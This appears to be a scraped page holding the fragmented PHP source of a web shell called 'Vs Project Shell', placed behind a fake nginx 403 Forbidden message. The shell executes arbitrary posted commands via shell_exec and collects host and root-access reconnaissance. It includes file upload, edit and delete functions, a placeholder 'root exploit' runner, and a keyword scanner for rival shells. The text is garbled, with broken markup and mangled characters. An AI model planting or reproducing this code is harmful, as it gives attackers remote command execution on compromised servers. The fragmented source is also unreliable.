403 Forbidden

You don't have permission to access this resource.
nginx/1.23.4
$err"; ?>
=1024 && $i++/dev/null") ?? shell_exec("cat /proc/cpuinfo"); $mem = shell_exec("free -m"); $hostname = gethostname(); $os = php_uname(); $domains = shell_exec("ls /etc/valiases 2>/dev/null | wc -l"); $user = trim(shell_exec('whoami')); $isRoot = ($user === 'root') ? "โœ… ROOT ACCESS" : "โš ๏ธ User: $user"; return "
".
    "๐Ÿ“› Hostname : $hostname\n".
    "๐Ÿ–ฅ OS       : $os\n".
    "๐Ÿ” Login    : $isRoot\n".
    "๐ŸŒ Domains  : ".trim($domains)."\n\n".
    "๐Ÿ’พ Memory Info:\n$mem\n".
    "โš™๏ธ CPU Info:\n$cpuinfo
"; } $log = ''; // Add file if (isset($_POST['addfile']) && !empty($_POST['filename'])) { $filename = basename($_POST['filename']); if (!in_array($filename, $protectedFiles)) { $content = $_POST['newfile']; file_put_contents("$path/$filename", $content); chmod("$path/$filename", 0444); $log = "File '$filename' created and locked (chmod 444)."; } else { $log = "Permission denied to create protected file '$filename'."; } } // Upload file if (isset($_POST['uploadfile']) && isset($_FILES['upfile']) && $_FILES['upfile']['error'] === UPLOAD_ERR_OK) { $fname = basename($_FILES['upfile']['name']); if (!in_array($fname, $protectedFiles)) { $target = "$path/$fname"; move_uploaded_file($_FILES['upfile']['tmp_name'], $target); chmod($target, 0444); $log = "File '$fname' uploaded and locked (chmod 444)."; } else { $log = "Permission denied to upload protected file '$fname'."; } } // Shell scanner $suspicious = []; if (isset($_POST['scan_shells'])) { foreach (scandir($path) as $file) { if (!is_file("$path/$file") || in_array($file, $protectedFiles)) continue; $content = @file_get_contents("$path/$file"); if (preg_match('/(shell_exec|eval|base64_decode|system|exec|passthru|popen|proc_open)/i', $content)) { $suspicious[] = $file; } } } // File manager & command if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; $log = shell_exec($cmd." 2>&1"); } if (isset($_POST['run_root'])) { $root_exploit = "#!/bin/bash\necho \"Running root exploit...\""; $tmp = tempnam("/tmp", "exploit_"); file_put_contents($tmp, $root_exploit); chmod($tmp, 0755); $log = shell_exec("bash $tmp 2>&1"); unlink($tmp); } if (isset($_GET['delete']) && file_exists("$path/".$_GET['delete'])) { $target = "$path/".$_GET['delete']; if (!in_array($_GET['delete'], $protectedFiles)) { chmod($target, 0666); unlink($target); $log = "File '".$_GET['delete']."' deleted."; } } if (isset($_POST['renamefrom']) && isset($_POST['renameto'])) { $from = basename($_POST['renamefrom']); $to = basename($_POST['renameto']); if (!in_array($from, $protectedFiles)) { chmod("$path/$from", 0666); rename("$path/$from", "$path/$to"); $log = "File '$from' renamed to '$to'."; } } if (isset($_GET['edit']) && file_exists("$path/".$_GET['edit'])) { if (!in_array($_GET['edit'], $protectedFiles)) { $edit_file = $_GET['edit']; $file_contents = htmlspecialchars(file_get_contents("$path/$edit_file")); ?> Edit <?=htmlspecialchars($edit_file)?> - Vs Project

Edit File:



Cancel
Vs Project Shell

Vs Project Shell

Result:"; if ($suspicious) { echo ""; } else { echo "

No suspicious file found.

"; } } if (!empty($log)) echo "
$log
"; ?>

โž• Add File




โฌ†๏ธ Upload File

Rename File

From: To:

File Manager

"; echo ""; } ?>
NameSizePermsAction
"; echo is_dir($fp) ? "$f" : "$f"; echo "".(is_file($fp) ? human(filesize($fp)) : '-')."".perms($fp).""; if (is_file($fp) && !in_array($f, $protectedFiles)) { echo "๐Ÿ—‘ Delete"; } else { echo "Protected"; } echo "